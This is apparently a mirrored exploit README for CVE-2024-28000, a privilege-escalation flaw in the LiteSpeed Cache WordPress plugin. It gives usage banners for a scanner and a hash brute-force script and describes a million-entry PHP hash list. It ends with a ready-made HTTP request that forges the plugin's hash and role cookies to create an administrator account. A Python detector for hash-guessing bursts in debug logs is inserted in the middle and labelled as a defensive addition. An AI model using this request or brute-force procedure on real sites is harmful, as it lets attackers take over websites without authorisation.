## https://sploitus.com/exploit?id=F666A410-B73A-5730-A790-299D7201E746
# LiteSpeed Cache Privilege Escalation Exp

## CVE-2024-28000_Scan.py
- The script first identifies the plugin version and checks whether it is a vulnerable one, then tries to confirm whether the log file exists. If it does, it sends a request and then fetches the log file again to look for a leaked hash; if LiteSpeed has debug logging enabled, the correct hash may be leaked there.
```
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
Example:
```
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init
```
If LiteSpeed has debug logging enabled, you may see log entries like the ones above, where pkHrfD is the correct hash.
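The `[Router] hash not match` lines above are also what a defender should watch for: a single client producing a burst of them is a hash-enumeration attempt, and the line being written at all means debug logging is putting the role hash on disk. The following detection example is added here and is not part of this repository; it assumes the line layout shown in the excerpt (`MM/DD/YY HH:MM:SS.mmm [ip:port ...] message`) and runs over constructed sample lines.

```python
import re
from collections import defaultdict
from datetime import datetime

# Line layout taken from the debug-log excerpt above: "MM/DD/YY HH:MM:SS.mmm [ip:port ...] message"
LINE_RE = re.compile(r"^(?P<ts>\d{2}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) "
                     r"\[(?P<ip>[\d.]+):\d+ [^\]]*\] (?P<msg>.*)$")
# Role-validation failure line; only the attempted value is kept, the expected one is discarded
MISMATCH_RE = re.compile(r"\[Router\] hash not match (?P<tried>\S+) != \S+")

def parse_line(line):
    # Returns (timestamp, client_ip, message), or None for lines in another format
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.strptime(m.group("ts"), "%m/%d/%y %H:%M:%S.%f"), m.group("ip"), m.group("msg")

def detect_hash_bruteforce(lines, window_seconds=60, threshold=5):
    """Per source IP: count 'hash not match' events and flag a burst of >= threshold inside window_seconds."""
    events = defaultdict(list)  # ip -> [(timestamp, attempted_hash)]
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, msg = parsed
        mm = MISMATCH_RE.search(msg)
        if mm:
            events[ip].append((ts, mm.group("tried")))
    findings = {}
    for ip, evs in events.items():
        evs.sort()
        peak, start = 0, 0
        for end in range(len(evs)):  # sliding window over the sorted timestamps
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        findings[ip] = {"mismatches": len(evs), "distinct_guesses": len({h for _, h in evs}),
                        "peak_in_window": peak, "bruteforce": peak >= threshold}
    return findings

# Constructed sample in the page's log format: one client cycling through guesses, one stray failure
SAMPLE_LOG = ["09/08/24 16:30:38.219 [203.0.113.5:41000 1 TG9] ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users"] + [
    f"09/08/24 16:30:{38 + i}.{200 + i:03d} [203.0.113.5:{41000 + i} 1 TG9] [Router] hash not match g{i:05d} != Zz9Qk1"
    for i in range(6)] + ["09/08/24 16:35:00.000 [198.51.100.7:50000 1 TG9] [Router] hash not match q00001 != Zz9Qk1"]
```

Feed it the plugin's debug log (or the web server's copy of it) and alert on any source with `bruteforce` set; a non-empty result on a production host is also a sign that debug logging should be switched off.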
## CVE-2024-28000_Exploit.py
- Testing showed that hashes generated by Python and by PHP differ, so the hash list cannot be simulated with Python. Hash_list.txt contains 1,000,000 hashes generated by PHP, so in theory at most 1,000,000 iterations are needed to reach the correct hash.
```
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
- `-d` is the hash list, `-u` the URL and `-t` the thread count; a high thread count is not recommended.

## Testing
- In a lab environment the hash was enumerated successfully, and after five reinstalls the hash was confirmed to be in the generated hash list each time, but several factors suggest the success rate in real-world use is low.
- Once the correct hash is found, the request below can be used to add an admin user

```
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=正确Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "xadminx@example.com", "roles": ["administrator"]}
```